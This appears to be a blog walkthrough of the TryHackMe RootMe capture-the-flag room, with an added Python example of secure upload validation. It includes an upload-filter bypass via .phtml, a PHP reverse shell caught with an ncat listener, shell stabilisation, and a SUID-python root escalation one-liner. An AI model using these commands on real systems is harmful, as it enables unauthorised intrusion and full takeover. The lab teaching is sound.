In this blog, you will learn how to hack the RootMe machine from TryHackMe.
So let's jump straight to TryHackMe and deploy the machine. Here is the link for the machine: https://www.tryhackme.com/room/rrootme
Start the machine.
1. Deploy the machine
– No answer needed.
Reconnaissance refers to the practice of covertly gathering data online. This intelligence gathering can be done with both pure and impure intentions. We are doing it with pure intentions on this test machine named RootMe. So let's perform a quick Nmap scan and find information about the target.
To scan the target you can use the following command:
nmap -A -T4 <MACHINE_IP>
1. Scan the rootme machine, how many ports are open?
– 2
2. What version of Apache is running?
– 2.4.29
3. What service is running on port 22?
– ssh
4. Find directories on the web server using the GoBuster tool.
To brute-force directories you can use the following command:
gobuster dir -u <URL> -w <WORDLIST_LOCATION>
– No answer needed.
5. What is the hidden directory?
– /panel/
Navigate to URL: http://<MACHINE_IP>
It's a basic web page with nothing interesting.
Let's check the source code of the website; sometimes you'll find sensitive endpoints, passwords, hidden paths and secret keys inside the source code.
Here we got nothing in the source code, so let's see what's in the hidden directory /panel/ that we discovered earlier using gobuster.
Navigating to URL: http://<MACHINE_IP>/panel
Here we found a file upload form.
Ah!!!! What if we can upload malicious .php files? Let's check.
Tried .php – Denied.
Tried .phtml – Success !!!!
Wanna know how I did this? It’s called file upload restrictions bypass.
To learn in depth about this do visit: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload
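To make the denylist-versus-allowlist point concrete, here is an added Python example (not the room's PHP and not from the original post) that contrasts the weak check the walkthrough ran into with a hardened one; the handler logic, the allowed image set and the magic-byte table are assumptions.

```python
"""Upload extension checks modelled on the /panel/ behaviour described above
(.php rejected, .phtml accepted). Added example, not the room's own code."""
import os
import secrets

# Extensions the server-side PHP handler is assumed to execute: the two the
# walkthrough observed. Extend with whatever your Apache/PHP handler maps.
SERVER_EXECUTABLE = {"php", "phtml"}

# Assumption: the form is meant to accept images only.
ALLOWED = {".png", ".jpg", ".jpeg", ".gif"}

# Leading bytes each allowed type must start with (constructed table).
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def denylist_allows(filename: str) -> bool:
    """The weak check: block '.php' only, so '.phtml' slips through."""
    return not filename.lower().endswith(".php")


def allowlist_allows(filename: str, data: bytes = b"") -> bool:
    """Hardened check: bare filename, allowlisted final extension, no
    executable inner extension (shell.php.png), and matching magic bytes."""
    base = os.path.basename(filename)
    if not base or base != filename or base.startswith("."):
        return False                      # path components or dotfiles
    stem, ext = os.path.splitext(base.lower())
    if ext not in ALLOWED:
        return False                      # .phtml, .php, anything unknown
    if any(part in SERVER_EXECUTABLE for part in stem.split(".")[1:]):
        return False                      # double extension trick
    return any(data.startswith(m) for m in MAGIC[ext])


def storage_name(filename: str) -> str:
    """Never keep the client's name on disk: random stem + vetted extension."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED:
        raise ValueError("extension not allowed")
    return secrets.token_hex(8) + ext
```

A matching magic header is not proof of a harmless file on its own; the stronger control is to store uploads outside the web root, or in a directory where the PHP handler is disabled, so nothing uploaded can ever execute.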
Now we can upload a PHP reverse shell here; we'll use the pentestmonkey php-reverse-shell.php script and catch the shell with netcat.
Download the script and remember to replace $ip in the script with your machine's IP and $port with any port; I'll be using 1337.
The netcat listener can be started using the following command:
ncat -nlvp <PORT_NUMBER>
Now we'll get the reverse shell by executing the uploaded script, visiting the following URL:
http://<MACHINE_IP>/uploads/php-reverse-shell.phtml
Voilà !!!!!
We have successfully gained a shell.
But the shell is not stable; let's stabilise it using the following command:
python3 -c "import pty;pty.spawn('/bin/bash')"
And find the user.txt file using the following command:
find / -type f -name user.txt 2>/dev/null
We have found the user.txt file; it's inside /var/www/.
To read the contents of the file you can use the following command:
cat /var/www/user.txt
1. user.txt
– THM{XXXXXXXXXXXXXXXX}
To escalate privileges we need to hunt for files with the SUID bit set,
and this can be achieved using the following command:
find / -type f -user root -perm -4000 2>/dev/null
Ah!!!!!!! Here /usr/bin/python has the SUID bit set – interesting.
1. Search for files with SUID permission, which file is weird?
– /usr/bin/python
2. Find a form to escalate your privileges.
– No answer needed.
Let’s escalate our privileges.
We got commands for privilege escalation; here we can skip the first command, as the python binary already has SUID permission. Copy and paste the command into the terminal without ./ to see if it works.
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
Voilà!!!!!! It works.
We have successfully escalated our privileges.
As we are root now, let's hunt for the root flag.
It's in the /root directory.
cat /root/root.txt
1. root.txt
– THM{XXXXXXXXXXXXXXXX}
DONE. ROOM COMPLETED!!!!!
Salud!!!!!
The RootMe CTF is aimed at beginners, and I recommend that all beginners try to root it.